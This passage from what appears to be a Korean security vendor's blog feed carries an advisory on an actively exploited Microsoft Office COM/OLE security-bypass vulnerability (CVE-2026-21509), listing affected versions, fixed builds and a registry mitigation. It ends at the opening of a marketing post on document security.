      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/O6L3x/dJMcad1QUdy/tWjnKPYtdpumngUjSqInx1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/O6L3x/dJMcad1QUdy/tWjnKPYtdpumngUjSqInx1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/O6L3x/dJMcad1QUdy/tWjnKPYtdpumngUjSqInx1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FO6L3x%2FdJMcad1QUdy%2FtWjnKPYtdpumngUjSqInx1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;692&quot; height=&quot;440&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;마이크로소프트는&lt;span&gt; Office&lt;/span&gt;에서 발견된 보안 기능 우회 취약점에 대해 긴급 업데이트를 배포했습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번에 발견된 취약점은&lt;span&gt; Office&lt;/span&gt;가 신뢰할 수 없는 입력값에 의존해 보안 결정을 내리는 과정에서 발생하며&lt;span&gt;, &lt;/span&gt;이를 악용하면 인증되지 않은 공격자가 정상적인&lt;span&gt; Office &lt;/span&gt;보안 보호 기능을 우회할 수 있습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 취약점을 성공적으로 악용하려면 취약한&lt;span&gt; COM/OLE &lt;/span&gt;컨트롤 호출 페이로드가 삽입된 오피스 문서를 사용자가 직접 실행하는&lt;span&gt; '&lt;/span&gt;사용자 상호작용&lt;span&gt;(User Interaction)' &lt;/span&gt;단계가 필수적입니다&lt;span&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;사용자가 문서를 열람하는 순간&lt;span&gt;, OLE &lt;/span&gt;보안 보호 체계가 논리적으로 우회되면서 별도의 경고 창 없이도 백그라운드에서 임의의 악성 코드가 실행될 수 있습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 취약점은 이미 실제 공격에서 악용된 사례가 보고된 제로데이 취약점이므로 사용 중인 오피스 제품군에 대해 즉시 보안 패치를 적용하실 것을 권고 드립니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;CVE&lt;/span&gt;&lt;span&gt;번호&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;CVE-2026-21509&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;영향 받는 버전&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;Microsoft Office 2016 &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;Microsoft Office 2019 &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;Microsoft Office 2021&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;Microsoft Office LTSC 2021 &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;Microsoft Office LTSC 2024 &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;Microsoft 365 Apps for Enterprise (&lt;/span&gt;&lt;span&gt;클라우드 기반 구독형&lt;span&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;패치 방법&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style14&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 22.2093%; text-align: center;&quot;&gt;&lt;span&gt;대상 제품&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 24.6512%; text-align: center;&quot;&gt;&lt;span&gt;보호 방식&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 31.279%; text-align: center;&quot;&gt;&lt;span&gt;조치 방법&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 21.8605%; text-align: center;&quot;&gt;&lt;span&gt;비고&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 22.2093%; text-align: center;&quot;&gt;&lt;span&gt;Office 2021&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 24.6512%; text-align: center;&quot;&gt;&lt;span&gt;&lt;span&gt;서비스 측 자동 보호&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span&gt;(Service-side change)&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 31.279%; text-align: center;&quot;&gt;&lt;span&gt;Office &lt;/span&gt;&lt;span&gt;앱 종료 후 재실행&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 21.8605%; text-align: center;&quot;&gt;&lt;span&gt;별도 패치 설치 불필요&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 22.2093%; text-align: center;&quot;&gt;&lt;span&gt;Office LTSC 2021 / 2024&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 24.6512%; text-align: center;&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;서비스 측 자동 보호&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;(Service-side change)&lt;/td&gt;
&lt;td style=&quot;width: 31.279%; text-align: center;&quot;&gt;&lt;span&gt;Office &lt;/span&gt;&lt;span&gt;앱 종료 후 재실행&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 21.8605%; text-align: center;&quot;&gt;&lt;span&gt;재시작 시 보호 적용&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 22.2093%; text-align: center;&quot;&gt;&lt;span&gt;Microsoft 365 Apps&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 24.6512%; text-align: center;&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;서비스 측 자동 보호&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;(Service-side change)&lt;/td&gt;
&lt;td style=&quot;width: 31.279%; text-align: center;&quot;&gt;&lt;span&gt;Office &lt;/span&gt;&lt;span&gt;앱 종료 후 재실행&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 21.8605%; text-align: center;&quot;&gt;&lt;span&gt;최신 상태 유지 권장&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 22.2093%; text-align: center;&quot;&gt;&lt;span&gt;Office 2019 (32/64-bit)&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 24.6512%; text-align: center;&quot;&gt;&lt;span&gt;보안 패치 적용&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 31.279%; text-align: center;&quot;&gt;&lt;span&gt;빌드 &lt;b&gt;&lt;span&gt;16.0.10417.20095 &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span&gt;이상&lt;/span&gt;&lt;/b&gt; 업데이트&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 21.8605%; text-align: center;&quot;&gt;&lt;span&gt;2026.01.26 &lt;/span&gt;&lt;span&gt;보안 업데이트&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 22.2093%; text-align: center;&quot;&gt;&lt;span&gt;Office 2016 (32/64-bit)&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 24.6512%; text-align: center;&quot;&gt;&lt;span&gt;보안 패치 적용&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 31.279%; text-align: center;&quot;&gt;&lt;span&gt;빌드 &lt;b&gt;&lt;span&gt;16.0.5539.1001 &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span&gt;이상&lt;/span&gt;&lt;/b&gt; 업데이트&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 21.8605%; text-align: center;&quot;&gt;&lt;span&gt;2026.01.26 &lt;/span&gt;&lt;span&gt;보안 업데이트&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;완화 조치&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;보안 패치를 즉시 적용하기 어려운 경우&lt;span&gt;, &lt;/span&gt;레지스트리 수정을 통해 취약한&lt;span&gt; COM/OLE &lt;/span&gt;컨트롤을 차단하는 완화 조치를 시행할 수 있습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&lt;b&gt;※ 주의&lt;/b&gt;: &lt;/span&gt;레지스트리를 잘못 수정하면 시스템에 심각한 문제가 발생할 수 있으므로 작업 전 반드시 백업을 권장드립니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;1. Office 종료 및 레지스트리 편집기 실행&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;1) &lt;/span&gt;모든&lt;span&gt; MS Office &lt;/span&gt;프로그램을 종료합니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;2) Win + R &lt;/span&gt;키를 누르고&lt;span&gt; regedit&lt;/span&gt;를 입력하여 레지스트리편집기를 실행합니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;2. &lt;/span&gt;경로 찾아가기&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;사용하는 Office 설치 방식&lt;span&gt;(64&lt;/span&gt;비트&lt;span&gt;/32&lt;/span&gt;비트 등&lt;span&gt;)&lt;/span&gt;에 맞는 경로를 찾아갑니다&lt;span&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;64비트 경로: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Common\COM Compatibility\&amp;nbsp;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span&gt;32&lt;/span&gt;&lt;span&gt;비트 경로 &lt;span&gt;(for 32-bit MSI Office on 64-bit Windows): &lt;/span&gt;&lt;/span&gt;HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Common\COM Compatibility\&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span&gt;간편 실행&lt;span&gt;(ClickToRun) &lt;/span&gt;경로&lt;span&gt;: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Office\16.0\Common\COM Compatibility\&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;간편 실행&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;(ClickToRun)&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;경로&lt;/span&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&amp;nbsp;(for 32-bit Click2Run Office on 64-bit Windows): HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Office\16.0\Common\COM Compatibility\&amp;nbsp;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;(COM Compatibility &lt;/span&gt;키가 없다면 상위 키에서 마우스 우클릭 후&lt;span&gt; [&lt;/span&gt;새로 만들기&lt;span&gt; &amp;gt; &lt;/span&gt;키&lt;span&gt;]&lt;/span&gt;로 생성합니다.&lt;span&gt;)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;3. &lt;/span&gt;차단 값 추가&lt;/b&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span&gt;생성할 키 이름&lt;span&gt;: {EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B}&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span&gt;값 이름&lt;span&gt;: Compatibility Flags&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;값 데이터&lt;span&gt;: 400 (16&lt;/span&gt;진수&lt;span&gt;)&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;1) COM Compatibility &lt;/span&gt;키 아래에&lt;span&gt; '{EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B}' &lt;/span&gt;라는 이름의 새 키를 생성합니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;825&quot; data-origin-height=&quot;415&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/NAEJe/dJMcabJOP2M/nr2PCp514pNIRvB6IFktA0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/NAEJe/dJMcabJOP2M/nr2PCp514pNIRvB6IFktA0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/NAEJe/dJMcabJOP2M/nr2PCp514pNIRvB6IFktA0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FNAEJe%2FdJMcabJOP2M%2Fnr2PCp514pNIRvB6IFktA0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;825&quot; height=&quot;415&quot; data-origin-width=&quot;825&quot; data-origin-height=&quot;415&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;2) &lt;/span&gt;생성한 키에서 마우스 우클릭&lt;span&gt;&lt;span&gt;&amp;nbsp; &lt;/span&gt;[&lt;/span&gt;새로 만들기&lt;span&gt; &amp;gt; DWORD(32&lt;/span&gt;비트&lt;span&gt;) &lt;/span&gt;값&lt;span&gt;]&lt;/span&gt;을 클릭합니다&lt;span&gt;.&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;830&quot; data-origin-height=&quot;433&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/d6FGY1/dJMcacIH41g/aorSI83qjPKKgoFT103Jkk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/d6FGY1/dJMcacIH41g/aorSI83qjPKKgoFT103Jkk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/d6FGY1/dJMcacIH41g/aorSI83qjPKKgoFT103Jkk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fd6FGY1%2FdJMcacIH41g%2FaorSI83qjPKKgoFT103Jkk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;830&quot; height=&quot;433&quot; data-origin-width=&quot;830&quot; data-origin-height=&quot;433&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;3) &lt;/span&gt;생성된 값의 이름은&lt;span&gt; Compatibility Flags&lt;/span&gt;로 지정하고&lt;span&gt;, &lt;/span&gt;해당 값을 더블 클릭하여 값 데이터에&lt;span&gt; 400 (16&lt;/span&gt;진수&lt;span&gt;)&lt;/span&gt;을 입력하고 확인을 클릭합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;877&quot; data-origin-height=&quot;375&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/kYrEG/dJMcafZH56O/geHKM9TbEbqL1Sp0cm8WZ1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/kYrEG/dJMcafZH56O/geHKM9TbEbqL1Sp0cm8WZ1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/kYrEG/dJMcafZH56O/geHKM9TbEbqL1Sp0cm8WZ1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FkYrEG%2FdJMcafZH56O%2FgeHKM9TbEbqL1Sp0cm8WZ1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;877&quot; height=&quot;375&quot; data-origin-width=&quot;877&quot; data-origin-height=&quot;375&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;4. &lt;/span&gt;레지스트리편집기를 종료하고 &lt;span&gt;Office&lt;/span&gt;를 재실행합니다&lt;span&gt;.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/2YZT3/dJMcacu90E8/EQ4cjiNiRzbD9qBVqTLcek/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/2YZT3/dJMcacu90E8/EQ4cjiNiRzbD9qBVqTLcek/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/2YZT3/dJMcacu90E8/EQ4cjiNiRzbD9qBVqTLcek/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F2YZT3%2FdJMcacu90E8%2FEQ4cjiNiRzbD9qBVqTLcek%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;400&quot; height=&quot;150&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;참고&lt;span&gt;:&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&lt;a href=&quot;https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509&quot;&gt;https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2026-21509&quot;&gt;https://www.cve.org/CVERecord?id=CVE-2026-21509&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2026-21509&quot;&gt;https://nvd.nist.gov/vuln/detail/CVE-2026-21509&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;</description>
      <category>국내외 보안동향</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5707</guid>
      <comments>https://alyacofficialblog.tistory.com/5707#entry5707comment</comments>
      <pubDate>Wed, 28 Jan 2026 10:34:48 +0900</pubDate>
    </item>
    <item>
      <title>문서보안, 이제는 &amp;lsquo;관리&amp;rsquo;가 아니라 &amp;lsquo;통제&amp;rsquo;의 문제입니다</title>
      <link>https://alyacofficialblog.tistory.com/5706</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;문서 유출 사고는 더 이상 일부 기업만의 이야기가 아닙니다. 퇴사 예정 직원의 자료 반출, 재택근무 중 개인 PC에 저장된 업무 문서 유출, 랜섬웨어 감염으로 인한 전사 자료 암호화까지. 최근 발생하는 문서 보안 사고의 상당수는 외부 해커가 아닌 조직 내부의 관리 구조에서 시작되고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384086.png&quot; data-origin-width=&quot;1024&quot; data-origin-height=&quot;642&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bmSYKg/dJMcafZFKtK/79aV3RPJMjXQPUQaDXBbo1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bmSYKg/dJMcafZFKtK/79aV3RPJMjXQPUQaDXBbo1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bmSYKg/dJMcafZFKtK/79aV3RPJMjXQPUQaDXBbo1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbmSYKg%2FdJMcafZFKtK%2F79aV3RPJMjXQPUQaDXBbo1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1024&quot; height=&quot;642&quot; data-filename=&quot;Group 2034384086.png&quot; data-origin-width=&quot;1024&quot; data-origin-height=&quot;642&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
